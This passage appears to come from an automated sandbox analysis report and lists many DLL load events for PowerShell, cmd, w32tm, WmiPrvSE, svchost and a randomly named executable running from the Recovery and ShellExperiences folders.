                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: urlmon.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: iertutil.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: srvcli.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: netutils.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: propsys.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wininet.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: miutils.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wmidcom.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dpapi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wbemcomn.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: urlmon.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: iertutil.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: srvcli.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: netutils.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: propsys.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wininet.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: miutils.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wmidcom.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dpapi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wbemcomn.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: urlmon.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: iertutil.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: srvcli.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: netutils.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: propsys.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wininet.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: miutils.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wmidcom.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dpapi.dll
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wbemcomn.dll
                                     Source: C:\Windows\System32\cmd.exe    Section loaded: cmdext.dll
                                     Source: C:\Windows\System32\cmd.exe    Section loaded: apphelp.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: mscoree.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: apphelp.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: kernel.appcore.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: version.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: vcruntime140_clr0400.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: windows.storage.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: wldp.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: profapi.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: cryptsp.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: rsaenh.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: cryptbase.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: sspicli.dll
                                     Source: C:\Windows\System32\chcp.com    Section loaded: ulib.dll
                                     Source: C:\Windows\System32\chcp.com    Section loaded: fsutilext.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: mscoree.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: kernel.appcore.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: version.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: vcruntime140_clr0400.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: windows.storage.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: wldp.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: profapi.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: cryptsp.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: rsaenh.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: cryptbase.dll
                                     Source: C:\Recovery\uAsLgsGzSk.exe    Section loaded: sspicli.dll
                                     Source: C:\Windows\System32\w32tm.exe    Section loaded: iphlpapi.dll
                                     Source: C:\Windows\System32\w32tm.exe    Section loaded: logoncli.dll
                                     Source: C:\Windows\System32\w32tm.exe    Section loaded: netutils.dll
                                     Source: C:\Windows\System32\w32tm.exe    Section loaded: ntmarta.dll
                                     Source: C:\Windows\System32\w32tm.exe    Section loaded: ntdsapi.dll
                                     Source: C:\Windows\System32\w32tm.exe    Section loaded: mswsock.dll
                                     Source: C:\Windows\System32\w32tm.exe    Section loaded: dnsapi.dll
                                     Source: C:\Windows\System32\w32tm.exe    Section loaded: rasadhlp.dll
                                     Source: C:\Windows\System32\w32tm.exe    Section loaded: fwpuclnt.dll
                                     Source: C:\Windows\System32\w32tm.exe    Section loaded: kernel.appcore.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: fastprox.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: ncobjapi.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: wbemcomn.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: wbemcomn.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: kernel.appcore.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: mpclient.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: userenv.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: version.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: userenv.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: msasn1.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: wmitomi.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: mi.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: miutils.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: miutils.dll
                                     Source: C:\Windows\System32\wbem\WmiPrvSE.exe    Section loaded: gpapi.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: mscoree.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: apphelp.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: kernel.appcore.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: version.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: vcruntime140_clr0400.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: windows.storage.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: wldp.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: profapi.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: cryptsp.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: rsaenh.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: cryptbase.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: sspicli.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: ktmw32.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: amsi.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: userenv.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: wbemcomn.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: iphlpapi.dll
                                     Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe    Section loaded: dnsapi.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: winnsi.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: rasapi32.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: rasman.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: rtutils.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: winmm.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: winmmbase.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: mmdevapi.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: devobj.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: ksuser.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: avrt.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: audioses.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: msacm32.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: midimap.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: edputil.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: dwrite.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: windowscodecs.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
